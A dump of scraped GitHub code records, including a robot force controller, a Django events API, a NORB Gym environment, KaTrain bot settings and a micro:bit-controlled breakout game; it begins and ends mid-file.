Pz]])\nI_identity = np.eye(12, 12)\ng = np.array([0, 0, 0, 0,0,0,0,0,0,0,0,-9.81]).reshape(12,1)\n\ndef skew_numpy(x):\n return np.array([[0, -x[2][0], x[1][0]],\n [x[2][0], 0, -x[0][0]],\n [-x[1][0], x[0][0], 0]])\n\ndef next_state(cur_state, cur_footstep, control_t, dt):\n R = rotation_matrix_body_world_numpy(cur_state[0], cur_state[1], cur_state[2])\n A[0:3, 6:9] = np.transpose(R)\n I_hat = np.matmul(R, np.matmul(I, np.transpose(R)))\n I_hat_inv = np.linalg.inv(I_hat)\n cur_footstep[0:3] = np.matmul(R, cur_footstep[0:3].reshape(3, 1)).reshape(3, 1)\n cur_footstep[3:6] = np.matmul(R, cur_footstep[3:6].reshape(3, 1)).reshape(3, 1)\n cur_footstep[6:9] = np.matmul(R, cur_footstep[6:9].reshape(3, 1)).reshape(3, 1)\n cur_footstep[9:12] = np.matmul(R, cur_footstep[9:12].reshape(3, 1)).reshape(3, 1)\n\n d1 = skew_numpy(np.vstack((cur_footstep[0, 0], cur_footstep[1, 0], cur_footstep[2, 0])))\n d2 = skew_numpy(np.vstack((cur_footstep[3, 0], cur_footstep[4, 0], cur_footstep[5, 0])))\n d3 = skew_numpy(np.vstack((cur_footstep[6, 0], cur_footstep[7, 0], cur_footstep[8, 0])))\n d4 = skew_numpy(np.vstack((cur_footstep[9, 0], cur_footstep[10, 0], cur_footstep[11, 0])))\n\n B[6:9, 0:3] = np.matmul(I_hat_inv, d1)\n B[6:9, 3:6] = np.matmul(I_hat_inv, d2)\n B[6:9, 6:9] = np.matmul(I_hat_inv, d3)\n B[6:9, 9:] = np.matmul(I_hat_inv, d4)\n\n state = np.matmul(I_identity + A * dt, cur_state) + np.matmul(B * dt, control_t) + dt * g\n\n return state","repo_name":"AlexS28/OptiState","sub_path":"misc/force_controller.py","file_name":"force_controller.py","file_ext":"py","file_size_in_byte":14327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24312944671","text":"def check(s,l):\r\n while(l>0):\r\n r=l%10\r\n if r not in s:\r\n return False\r\n l=l//10\r\n return True\r\n \r\nn=int(input())\r\ni=1\r\nt=1\r\ns=[0,1,2,5,6,8,9]\r\nwhile(t<=n):\r\n if check(s,i):\r\n t+=1\r\n i+=1\r\nprint(i-1)","repo_name":"Gamana05/typeface","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32395310566","text":"import json\nfrom zavod import settings\nfrom zavod.meta import Dataset\nfrom zavod.store import get_view\nfrom zavod.crawl import crawl_dataset\nfrom zavod.exporters import export_dataset\n\n\ndef test_metadata_collection_export(testdataset1: Dataset, collection: Dataset) -> None:\n ds_path = settings.DATA_PATH / \"datasets\" / testdataset1.name\n crawl_dataset(testdataset1)\n view = get_view(testdataset1)\n export_dataset(testdataset1, view)\n assert ds_path.is_dir()\n catalog_path = ds_path / \"catalog.json\"\n assert not catalog_path.is_file()\n index_path = ds_path / \"index.json\"\n assert index_path.is_file()\n\n with open(index_path, \"r\") as fh:\n index = json.load(fh)\n assert index[\"updated_at\"] == settings.RUN_TIME_ISO\n assert len(index[\"resources\"]) > 2\n\n collection_path = settings.DATA_PATH / \"datasets\" / collection.name\n view = get_view(collection)\n export_dataset(collection, view)\n assert collection_path.is_dir()\n catalog_path = collection_path / \"catalog.json\"\n assert catalog_path.is_file()\n\n with open(catalog_path, \"r\") as fh:\n catalog = json.load(fh)\n\n assert catalog[\"updated_at\"] == settings.RUN_TIME_ISO\n assert len(catalog[\"datasets\"]) == len(collection.datasets)\n for ds in catalog[\"datasets\"]:\n assert ds[\"updated_at\"] == settings.RUN_TIME_ISO\n if ds[\"name\"] in (collection.name, testdataset1.name):\n assert len(ds[\"resources\"]) > 2\n","repo_name":"opensanctions/opensanctions","sub_path":"zavod/zavod/tests/exporters/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":408,"dataset":"github-code","pt":"43"} +{"seq_id":"21518922340","text":"from PageObjectLibrary import PageObject\nimport time\n\n\nclass eshop_sharedComponents(PageObject):\n ebook_category = \"st_advanced_ma_6\"\n ebook_category_page_text = \"//h1/span[contains(text(), 'Elektronické čtečky knih')]\"\n shopping_cart_button = \"id:blockcart_top_wrap\"\n shopping_cart_item_count = \"//a[@id='shopping_cart']/div//span[contains(@class, 'ajax_cart_quantity amount_circle')]\"\n shopping_cart_item_check = \"//a[@id='shopping_cart']/div//span[contains(text(), {item_count})]\"\n\n def wait_for_eshop_homepage(self):\n \"\"\"Wait until eshop homepage is loaded.\"\"\"\n self.selib.wait_until_page_contains(\"Acomp\", 10)\n\n def click_ebook_category_button(self):\n \"\"\"Click ebook category button.\"\"\"\n self.selib.click_element(self.ebook_category)\n self.selib.wait_until_page_contains_element(self.ebook_category_page_text, 10)\n\n def click_shopping_cart_button(self):\n \"\"\"Click shopping cart button.\"\"\"\n self.selib.click_element(self.shopping_cart_button)\n self.selib.wait_until_page_contains(\"Váš nákupní košík\", 10)\n\n def get_shopping_cart_item_count(self):\n \"\"\"Returns number of items in shopping cart.\"\"\"\n return int(self.selib.get_text(self.shopping_cart_item_count))\n\n def verify_shopping_cart_item_count(self, item_count, timeout=5):\n \"\"\"\n Verify that shopping cart item count is equal to given item count.\n :param item_count: expected number of items in shopping cart\n :param timeout: timeout in seconds\n :rtype boolean\n :returns true if expected number of items is in the shopping cart\n \"\"\"\n i = 0\n verified = False\n while i <= timeout:\n shopping_cart_item_check_locator = self.shopping_cart_item_check.replace(\"{item_count}\", str(item_count))\n verified = self.selib.get_element_count(shopping_cart_item_check_locator) > 0\n if verified:\n break\n else:\n time.sleep(1)\n i += 1\n if verified is False:\n print(\"Shopping cart item count was not verified!\")\n return verified\n","repo_name":"Swan31/msd","sub_path":"eshop/pageobjects/eshop_sharedComponents.py","file_name":"eshop_sharedComponents.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32018721239","text":"import sys, os\nfrom chameleon.zpt import loader\n\ndef template(name):\n frame = sys._getframe(1)\n template_path = os.path.join(\n os.path.dirname(\n frame.f_globals['__file__'])\n )\n template_loader = loader.TemplateLoader(\n template_path,\n auto_reload=os.environ['SERVER_SOFTWARE'].startswith('Dev')\n )\n frame.f_locals['template'] = template_loader.load(name)\n\n\ndef require(name):\n frame = sys._getframe(1)\n frame.f_locals['permission_required'] = name\n","repo_name":"kagesenshi/componentae","sub_path":"componentae/directive.py","file_name":"directive.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"13844241963","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import AuthenticationFailed\nimport jwt\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db.models import Q\n\nfrom .serializers import EventSerializer, User2EventSerialzier, UserEventPreferencesSerializer\nfrom .models import Event, UserEventPreferences, User2Event\nfrom users.models import User\nfrom groups.models import Group, Event2Group\nfrom groups.serializers import GroupSerializer, Event2GroupSerializer\nfrom users.serializers import UserSerializer\nfrom functions.getUser import getUser\n\n\n# Create your views here.\n\nclass EventCreationView(APIView):\n def post(self, request):\n user = getUser(request)\n if user == None:\n return Response(status=400)\n userId = user.id\n request.data.update({\"owner\":userId}) \n \n eventGroupName = request.data.get('eventGroup')\n eventGroup = Group.objects.filter(title = eventGroupName).first()\n eventGroupId = eventGroup.id\n \n request.data.pop(\"eventGroup\")\n request.data.update({\"eventGroup\": eventGroupId})\n \n print(request.data) #['id', 'title', 'location', 'owner', 'date', 'eventType', 'eventGroup', 'coverImg']\n \n serializer = EventSerializer(data=request.data)\n if serializer.is_valid() == False:\n print(serializer.errors)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n \nclass EventSingularGetViaIdView(APIView):\n def post(self, request):\n requId = request.data['id']\n event = Event.objects.filter(id = requId).first()\n serializer = EventSerializer(event, many=False)\n return Response(data=serializer.data)\n\nclass EventCollectionView(APIView):\n def post(self, request): # credentails\n user = getUser(request)\n if user == None:\n return Response(status=400)\n filterEvents = None\n \n if request.data.get('isBaisedOnGroup'):\n groupTitle = request.data.get('groupTitle')\n group = Group.objects.filter(title=groupTitle).first()\n print(group)\n \n event2Groups = Event2Group.objects.filter(group=group.id)\n \n ids = []\n for e in event2Groups:\n ids.append(e.event.id)\n else:\n if request.data.get('excludeDisliked'):\n filterEvents = UserEventPreferences.objects.filter(user=user.id).filter(isDisliked=True)\n filterEvents = UserEventPreferences.objects.filter(user=user.id).filter(isDisliked=True)\n print(filterEvents)\n elif request.data.get('isOnlyDisliked'):\n filterEvents = UserEventPreferences.objects.filter(user=user.id).filter(isDisliked=True)\n elif request.data.get('isOnlyLiked'):\n filterEvents = UserEventPreferences.objects.filter(user=user.id).filter(isLiked=True)\n else:\n events = Event.objects.all()\n serializer = EventSerializer(events, many=True)\n return Response(data=serializer.data)\n ids = []\n if filterEvents != None:\n for e in filterEvents:\n ids.append(e.event.id)\n \n events = None\n \n if request.data.get('excludeDisliked'):\n events = Event.objects.exclude(id__in=ids)\n else:\n events = Event.objects.filter(id__in=ids)\n serializer = EventSerializer(events, many=True)\n return Response(data=serializer.data)\n \nclass EventSingularGetViaTitleView(APIView):\n def post(self, request):\n title = request.data['title']\n event = Event.objects.filter(title = title).first()\n serializer = EventSerializer(event)\n return Response(data=serializer.data)\n \nclass EventUserAssignmentView(APIView):\n # eventTitle, viaEmail, email, isOwner, isCoOwner, isGuest\n def post(self, request):\n \n userId = None\n if request.data['viaEmail'] == True:\n userId = User.objects.filter(email=request.data['email']).first().id\n else:\n user = getUser(request)\n if user == None:\n return Response(status=400)\n userId = user.id\n \n event = Event.objects.filter(title = request.data[\"eventTitle\"]).first()\n if event == None:\n raise \"No Event With that title found\"\n \n \n finalData = {\n \"event\":event.id,\n \"user\":userId,\n \"isOwner\":request.data['isOwner'],\n \"isCoOwner\":request.data['isCoOwner'],\n \"isGuest\":request.data[\"isGuest\"]\n }\n \n seralizer = User2EventSerialzier(data=finalData)\n seralizer.is_valid(raise_exception=True)\n seralizer.save()\n return Response(seralizer.data)\n \nclass UserPreferenceSetView(APIView): # credentails, isLiked, isDisliked, eventTitle\n def post(self, request):\n user = getUser(request)\n if user == None:\n return Response(status=400)\n userId = user.id\n user = User.objects.filter(id=userId).first()\n \n eventTitle = request.data.get('eventTitle')\n request.data.pop('eventTitle')\n event = Event.objects.filter(title=eventTitle).first()\n \n request.data.update({'user': user.id})\n request.data.update({'event': event.id})\n \n serializer = UserEventPreferencesSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n \n token = request.COOKIES.get('jwt').split(\"=\")[1].split(\";\")[0]\n print(token)\n \n return Response()#serializer.data)\n \nclass GetMembersFromEvent(APIView):\n def post(self, request):\n eventId = request.data.get('id')\n \n rawGroupsRelations = None\n if request.data.get('isStaffOnly'):\n rawGroupsRelations = User2Event.objects.filter(event=eventId)\n else:\n rawGroupsRelations = User2Event.objects.filter(event=eventId).filter(Q(isOwner=True) | Q(isCoOwner=True))\n \n \n peopleIds = []\n for relation in rawGroupsRelations:\n peopleIds.append(relation.user.id)\n \n rawMembers = User.objects.filter(id__in=peopleIds)\n serializer = UserSerializer(rawMembers, many=True)\n return Response(serializer.data)\n","repo_name":"JonFactor/App-Dev","sub_path":"backend/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11381501236","text":"\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.layers import *\nfrom tensorflow.nn import *\nimport numpy as np\nimport sys\nimport os\nimport gym\nfrom gym import spaces\nimport glob\nimport sys\nimport keras as keras\nimport six\nfrom six.moves import cPickle as pickle\nimport scipy as scipy\nimport scipy.io as io\nfrom tqdm import tqdm\n\nlib_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(lib_path)\nimport dataset\n\nfrom keras.models import load_model\nfrom keras.layers import *\nfrom keras import backend as K\nfrom keras.engine.topology import Layer\n\nimport matplotlib as mpl\nimport matplotlib.image as mpimg\nimport random\nfrom matplotlib import pyplot as plt\n\nclass NorbEnv(gym.Env):\n metadata = {'render.modes': ['human', 'rgb_array']}\n max_index = 972\n min_index = 0\n num_actions = 4\n my_path = os.path.abspath(os.path.dirname(__file__))\n dataset_loc = os.path.join(my_path, 'dataset_norb.p')\n max_ep_time = 1500\n scenarios = ['dense_reward', 'sparse_reward', 'one_shot']\n elevation_angles = 9\n azimuth_angles = 18\n max_traj_len = elevation_angles + azimuth_angles - 2\n \n\n \"\"\"\n Description:\n A toy is turned around (azimuth / elevation changes) until it matches a\n target viewpoint\n Source:\n Our [TNS group, INI, RUB] own creation --- based on the NORB data set\n Observation:\n Type: Numpy Array with shape (96, 96, 4)\n Slice\tData description\n Obs[:, :, 0]\tLeft camera view on current object\n Obs[:, :, 1]\tRight camera view on current object\n Obs[:, :, 2]\tLeft camera view on target object\n Obs[:, :, 3]\tRight camera view on target object\n\n Actions:\n Type: Discrete(4)\n Num\tAction\n 0\t Rotate object 20° on turn table\n 1\t Rotate object -20° on turn table\n 2\t Elevate camera by 5°\n 3\t Lower camera by 5°\n\n Reward:\n Reward is 1 if the viewpoint is the same as the target viewpoint,\n otherwise -1\n Starting State:\n The toy is assigned a random viewpoint and the target viewpoint is found\n Episode Termination:\n (TODO: Add \"Episode length is greater than 200\" if it's clever)\n Solved Requirements\n Considered solved when the current viewpoint matches the target\n viewpoint\n \"\"\"\n # template from https://stackoverflow.com/questions/45068568/how-to-create-a-new-gym-environment-in-openai\n\n def __init__(self, scenario=None):\n super(NorbEnv, self).__init__()\n if scenario is None:\n scenario = self.scenarios[0]\n\n if scenario == self.scenarios[2]:\n self.action_space = spaces.MultiDiscrete([self.max_traj_len, self.num_actions])\n else:\n self.action_space = spaces.Discrete(self.num_actions)\n self.observation_space = spaces.Box(0, 255, (96, 96, 4), dtype=np.int)\n self.item = self.set_item(14, 'train')\n self._seed = 42\n self.scenario = scenario\n self.ep_time_left = None\n self.current_index = None\n self.target_index = None\n self.reset()\n\n def seed(self, seed=None):\n self._seed = np.random.randint(np.iinfo(np.int32).max, dtype=np.int32) if seed is None else seed\n\n def step(self, action):\n \"\"\"\n\n Parameters\n ----------\n action :\n\n Returns\n -------\n ob, reward, episode_over, info : tuple\n ob (object) :\n an environment-specific object representing your observation of\n the environment.\n reward (float) :\n amount of reward achieved by the previous action. The scale\n varies between environments, but the goal is always to increase\n your total reward.\n episode_over (bool) :\n whether it's time to reset the environment again. Most (but not\n all) tasks are divided up into well-defined episodes, and done\n being True indicates the episode has terminated. (For example,\n perhaps the pole tipped too far, or you lost your last life.)\n info (dict) :\n diagnostic information useful for debugging. It can sometimes\n be useful for learning (for example, it might contain the raw\n probabilities behind the environment's last state change).\n However, official evaluations of your agent are not allowed to\n use this for learning.\n \"\"\"\n if self.scenario == self.scenarios[2]:\n for a in action:\n self._take_action(a)\n self.ep_time_left == 1 # set episode time to zero effectively\n else:\n self._take_action(action)\n reward = self._get_reward()\n ob = np.stack((self.item[self.current_index].image_lt,\n self.item[self.current_index].image_rt,\n self.item[self.target_index].image_lt,\n self.item[self.target_index].image_rt), axis=2) #ob = self.env.getState()\n self.ep_time_left -= 1\n if self.ep_time_left == 0:\n episode_over = True\n else:\n over, _ = self._is_close()\n episode_over = over\n\n\n return ob, reward, episode_over, {}\n\n def reset(self):\n self.current_index = np.random.randint(self.max_index)\n self.target_index = np.random.randint(self.max_index)\n ob = np.stack((self.item[self.current_index].image_lt,\n self.item[self.current_index].image_rt,\n self.item[self.target_index].image_lt,\n self.item[self.target_index].image_rt), axis=2)\n ##ob = ob[np.newaxis, np.newaxis, :]\n self._seed = np.random.rand()\n self.ep_time_left = self.max_ep_time\n return ob\n\n def render(self, mode='human', close=False):\n if mode == 'human':\n plt.imshow(np.concatenate([self.item[self.current_index].image_lt, self.item[self.target_index].image_lt], axis=1))\n plt.ion()\n plt.pause(0.00001)\n if mode == 'rgb_array':\n return self.item[self.current_index].image_lt\n\n def _take_action(self, action):\n item = self.item\n b4_idx = self.current_index\n # actions mean in camera hemisphere space: left, right, up, down\n if action == 0:\n after_index = [i for i in range(len(item)) if item[i].azimuth==(item[b4_idx].azimuth+2)%36 and item[i].lighting==item[b4_idx].lighting and item[i].elevation==item[b4_idx].elevation ]\n if action == 1:\n after_index = [i for i in range(len(item)) if item[i].azimuth==(item[b4_idx].azimuth-2)%36 and item[i].lighting==item[b4_idx].lighting and item[i].elevation==item[b4_idx].elevation ]\n if action == 2:\n after_index = [i for i in range(len(item)) if item[i].azimuth==item[b4_idx].azimuth and item[i].lighting==item[b4_idx].lighting and item[i].elevation==(min(8, item[b4_idx].elevation+1)) ]\n if action == 3:\n after_index = [i for i in range(len(item)) if item[i].azimuth==item[b4_idx].azimuth and item[i].lighting==item[b4_idx].lighting and item[i].elevation==(max(0, item[b4_idx].elevation-1)) ]\n try: self.current_index = after_index[0]\n except: print(after_index)\n\n def _viewpoint_dist(self, vp1, vp2):\n # ignore lighting conditions\n return abs(vp1.elevation - vp2.elevation) + min(36 - abs(vp1.azimuth - vp2.azimuth), abs(vp1.azimuth - vp2.azimuth))\n\n def _is_close(self):\n i = self.current_index\n t = self.target_index\n dist = self._viewpoint_dist(self.item[i], self.item[t])\n return np.isclose(dist, 0), dist\n\n def _get_reward(self):\n close, dist = self._is_close()\n reward = 0\n\n if close:\n reward = 2\n else:\n if self.scenario == self.scenarios[0]: # dense rewards\n reward = -1 * dist/50.\n else: # sparse rewards or one-shot\n reward = 0\n\n return reward\n\n\n def set_item(self, seq_no, instance):\n try:\n dataset = pickle.load(open(self.dataset_loc, 'rb'))\n lists = dataset.group_dataset_by_category_and_instance(instance)\n del dataset\n return lists[seq_no]\n except:\n print('Please provide norb dataset at location \\\"{}\\\"'.format(self.dataset_loc))\n quit(-1)\n\n","repo_name":"wiskott-lab/gym-norb","sub_path":"norb/norb.py","file_name":"norb.py","file_ext":"py","file_size_in_byte":8526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"72783009091","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\n\nif ( len(sys.argv) == 1 ):\n print(\"Use full directory path as an argument.\\n Example:\")\n print(sys.argv[0],\"/home/user/git/repository/\")\n exit() \n\npath = sys.argv[1]\n\n#print( 'Number of arguments',len(sys.argv) )\n#print( 'Is directory', os.path.isdir(sys.argv[1]) )\nif os.path.isdir(sys.argv[1]):\n bash_command = [\"cd \"+path, \"git status\"]\n result_os = os.popen(' && '.join(bash_command)).read()\n #is_change = False\n for result in result_os.split('\\n'):\n if result.find('modified') != -1:\n prepare_result = result.replace('\\tmodified: ', '')\n print(path+prepare_result)\n # break\nelse:\n print(\"Use full directory path as an argument.\\n Example:\")\n print(sys.argv[0],\"/home/user/git/repository/\")\n exit()\n\n","repo_name":"bvmspb/devops-netology","sub_path":"04_script_02_py/04_02_03.py","file_name":"04_02_03.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"73681096450","text":"import sys\n\nfrom katrain.core.base_katrain import KaTrainBase, Player\nfrom katrain.core.constants import *\n\nDEFAULT_PORT = 8587\n\n\nclass Logger(KaTrainBase):\n def __init__(self, debug_level=0, output_level=OUTPUT_INFO):\n super().__init__(force_package_config=True, debug_level=debug_level)\n self.output_level = output_level\n\n def log(self, msg, level=OUTPUT_INFO):\n if level <= self.output_level:\n print(msg, file=sys.stderr)\n\n\nbot_strategies = {\n \"dev\": (\n AI_SIMPLE_OWNERSHIP,\n {\"max_points_lost\": 2.0, \"settled_weight\": 1.0, \"opponent_fac\": 0.5},\n {\"max_visits\": 500},\n ),\n \"dev-beta\": (\n AI_SIMPLE_OWNERSHIP,\n {\"max_points_lost\": 1.75, \"settled_weight\": 1.0, \"opponent_fac\": 0.5},\n {\"max_visits\": 500, \"wide_root_noise\": 0.02},\n ),\n \"strong\": (\n AI_SIMPLE_OWNERSHIP,\n {\"max_points_lost\": 1.1, \"settled_weight\": 1.0, \"opponent_fac\": 0.5, \"min_visits\": 3},\n {\"max_visits\": 1000,\"wide_root_noise\": 0.02},\n ),\n # \"dev\": (AI_SCORELOSS, {\"strength\": 0.5}, {\"max_visits\": 500}),\n # \"dev\": (AI_WEIGHTED, {\"weaken_fac\": 0.5},{}),\n \"balanced\": (AI_SCORELOSS, {\"strength\": 0.35}, {\"max_visits\": 500}), # 1d?\n \"territory\": (AI_TERRITORY, {}, {}),\n # \"dev\": (AI_POLICY, {}, {}),\n #\"strong\": (AI_POLICY, {}, {}),\n \"weak\": (AI_DEFAULT, {}, {\"max_visits\": 500,'max_time':15}),\n \"influence\": (AI_INFLUENCE, {}, {}),\n # \"balanced\": (AI_PICK, {}, {}),\n \"weighted\": (AI_WEIGHTED, {}, {\"weaken_fac\": 1.0}),\n \"local\": (AI_LOCAL, {}, {}),\n \"tenuki\": (AI_TENUKI, {}, {}),\n \"18k\": (AI_RANK, {\"kyu_rank\": 18}, {}),\n \"14k\": (AI_RANK, {\"kyu_rank\": 14}, {}),\n \"10k\": (AI_RANK, {\"kyu_rank\": 10}, {}),\n \"6k\": (AI_RANK, {\"kyu_rank\": 6}, {}),\n \"2k\": (AI_RANK, {\"kyu_rank\": 2}, {}),\n \"2d\": (AI_RANK, {\"kyu_rank\": -1}, {}),\n}\n\nengine_overrides = {\"dev\": {\"maxVisits\": 500}}\n\ngreetings = {\n \"dev\": \"Play in a way that simplifies the game.\",\n \"dev-beta\": \"Play in a way that simplifies the game.\",\n #\"strong\": \"Play top policy move.\",\n \"strong\": \"Play simple.\",\n \"weak\": \"Utility function inversed.\",\n \"influence\": \"Play an influential style.\",\n \"territory\": \"Play a territorial style.\",\n # \"balanced\": \"Play the best move out of a random selection.\",\n \"balanced\": \"Having a mid-life crisis and now plays in a way that complicates the game.\",\n \"weighted\": \"Play a policy-weighted move.\",\n \"local\": \"Prefer local responses.\",\n \"tenuki\": \"Prefer to tenuki.\",\n \"18k\": \"Calibrated version of katrain-balanced for ~18k\",\n \"14k\": \"Calibrated version of katrain-balanced for ~14k\",\n \"10k\": \"Calibrated version of katrain-balanced for ~10k\",\n \"6k\": \"Calibrated version of katrain-balanced for ~6k\",\n \"2k\": \"Calibrated version of katrain-balanced for ~2k\",\n \"2d\": \"Calibrated version of katrain-balanced for ~2d\",\n}\n","repo_name":"sanderland/katrain-bots","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"19815121984","text":"from re import L, X\r\nimport sys, pygame, random\r\nfrom typing import ByteString\r\nimport serial, time\r\nimport threading, queue\r\nimport time\r\nimport keyboard\r\n\r\n\r\n\r\nq = queue.Queue()\r\n#inizializzo variabili per la grafica\r\nGAME_OVER = pygame.image.load('gameOver.png')\r\nGAME_OVER = pygame.transform.scale(GAME_OVER,(350, 350))\r\nWIN = pygame.image.load('vittoria.png')\r\nWIN = pygame.transform.scale(WIN ,(380, 327))\r\nSFONDO_MENU = pygame.image.load('background.png')\r\nSFONDO_MENU = pygame.transform.scale(SFONDO_MENU,(640,480))\r\n\r\n#parte dei thread\r\nclass Read_Microbit(threading.Thread):\r\n def __init__(self):\r\n threading.Thread.__init__(self)\r\n self._running = True\r\n \r\n def terminate(self):\r\n self._running = False\r\n \r\n def run(self):\r\n #serial config\r\n port = \"COM10\"\r\n s = serial.Serial(port)\r\n s.baudrate = 115200\r\n while self._running:\r\n data = s.readline().decode() \r\n acc = [float(x) for x in data[1:-3].split(\",\")]\r\n q.put(acc)\r\n time.sleep(0.01)\r\n\r\n#classe per il muro composto da mattoncini\r\nclass Wall():\r\n\r\n def __init__(self):\r\n #carico immagine mattone\r\n self.brick = pygame.image.load(\"brick.png\") \r\n brickrect = self.brick.get_rect()\r\n #lunghezza e altezza del mattone\r\n self.bricklength = brickrect.right - brickrect.left \r\n self.brickheight = brickrect.bottom - brickrect.top \r\n #funzione per la costruzione del muro\r\n def build_wall(self, width): \r\n xpos = 0\r\n ypos = 60\r\n k = 0\r\n self.brickrect = []\r\n #52 è il numero dei mattoncini che compongono il muro\r\n for i in range (0, 52): \r\n if xpos > width:\r\n if k == 0:\r\n k = self.bricklength / 2#impostazione sfalsata\r\n else:\r\n k = 0\r\n xpos = -k\r\n ypos += self.brickheight\r\n \r\n self.brickrect.append(self.brick.get_rect()) \r\n self.brickrect[i] = self.brickrect[i].move(xpos, ypos)\r\n xpos = xpos + self.bricklength\r\n\r\n\r\ndef main():\r\n \r\n #inizializzo variabili per la bara, punteggio \r\n xspeed = 4\r\n yspeed = 4\r\n max_lives = 5\r\n bat_speed = 10\r\n score = 0 \r\n bgcolour = 13, 124, 112\r\n txtcolour = 9, 9, 9\r\n \r\n size = width, height = 640, 480\r\n\r\n pygame.init() \r\n screen = pygame.display.set_mode(size) #per finestra\r\n #screen = pygame.display.set_mode(size, pygame.FULLSCREEN)#per gioco in fullscreen\r\n #carica l'immagine della paletta\r\n bat = pygame.image.load(\"bat.png\") \r\n batrect = bat.get_rect()\r\n #carica l'immagine della pallina\r\n ball = pygame.image.load(\"ball.png\") \r\n ball.set_colorkey((255, 255, 255)) \r\n ballrect = ball.get_rect()\r\n \r\n\r\n #richiamo le funzioni per la costruzione e la distruzione del muro\r\n wall = Wall() #distruggere\r\n wall.build_wall(width) #muro\r\n\r\n batrect = batrect.move((width / 2) - (batrect.right / 2), height - 20)\r\n ballrect = ballrect.move(width / 2, height / 2) \r\n lives = max_lives\r\n clock = pygame.time.Clock()\r\n #pygame.key.set_repeat(1,30) nn dovrebbe servire cancellare \r\n pygame.mouse.set_visible(0)\r\n\r\n #menu \r\n tasto = \"p\"\r\n while True:\r\n #fin che non si preme P non parte il gioco.\r\n if tasto == \"p\":\r\n while keyboard.is_pressed(\"p\") == False:\r\n screen.blit(SFONDO_MENU, (0,0))\r\n pygame.display.flip()\r\n tasto = \"y\"\r\n \r\n\r\n clock.tick(60)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n\r\n acc = q.get()\r\n #if per capire in che senso è inclinato il microbit, <150 andrà a sinistra, >150 andrà a destra\r\n if (acc[0] < -150):#sinistra\r\n batrect = batrect.move(-bat_speed, 0)\r\n screen.blit(bat, batrect)\r\n elif (acc[0] > 150):#destra\r\n batrect = batrect.move(+bat_speed, 0)\r\n screen.blit(bat, batrect)\r\n q.task_done()\r\n\r\n #controlllo del muro sia a destra che a sinistra\r\n if (batrect.left < 0): \r\n batrect.left = 0\r\n if (batrect.right > 640):\r\n batrect.right = 640\r\n\r\n #se la palla ha toccato la piattaforma la fa rimbalzare \r\n if ballrect.bottom >= batrect.top and ballrect.bottom <= batrect.bottom and ballrect.right >= batrect.left and ballrect.left <= batrect.right:\r\n yspeed = -yspeed \r\n \r\n #muove con la velocità\r\n ballrect = ballrect.move(xspeed, yspeed) \r\n if ballrect.left < 0 or ballrect.right > width:\r\n #modifica la velocità x facendola rimbalzare\r\n xspeed = -xspeed \r\n if ballrect.top < 0:\r\n yspeed = -yspeed \r\n \r\n\r\n if ballrect.top > height:\r\n lives -= 1\r\n if score > 15:\r\n score -= 15\r\n rand = random.random() \r\n if random.random() > 0.5:\r\n xspeed = -xspeed \r\n ballrect.center = width * random.random(), height / 3 #centro della palla \r\n if lives == 0: \r\n screen.fill(bgcolour)\r\n screen.blit(GAME_OVER, (145, 50))\r\n fnt_score = pygame.font.SysFont(\"inkfree\", 40)\r\n surf_txt_score = fnt_score.render(\"Score: \" + str(score), True, txtcolour)\r\n screen.blit(surf_txt_score, (260, 420))\r\n\r\n pygame.display.flip()\r\n\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n \r\n #controllo collisione con mattone\r\n index = ballrect.collidelist(wall.brickrect) \r\n if index != -1: \r\n #ogni 100pt la velocità della pallina e dalla barra aumenterà\r\n if finale == 100:\r\n bat_speed += 2\r\n xspeed = abs(xspeed) + 0.7\r\n yspeed = abs(yspeed) + 0.7\r\n elif finale == 200:\r\n bat_speed += 2\r\n xspeed = abs(xspeed) + 1\r\n yspeed = abs(yspeed) + 1\r\n elif finale == 300:\r\n bat_speed += 2\r\n xspeed = abs(xspeed) + 0.7\r\n yspeed = abs(yspeed) + 0.7\r\n \r\n #controllo collisione e modifica rimbalzo\r\n if ballrect.center[0] > wall.brickrect[index].right or \\\r\n ballrect.center[0] < wall.brickrect[index].left: \r\n\r\n xspeed = -xspeed\r\n else:\r\n yspeed = -yspeed \r\n #+10pt ad ogni mattoncino rotto\r\n wall.brickrect[index:index + 1] = []\r\n score += 10 \r\n\r\n \r\n #stampa 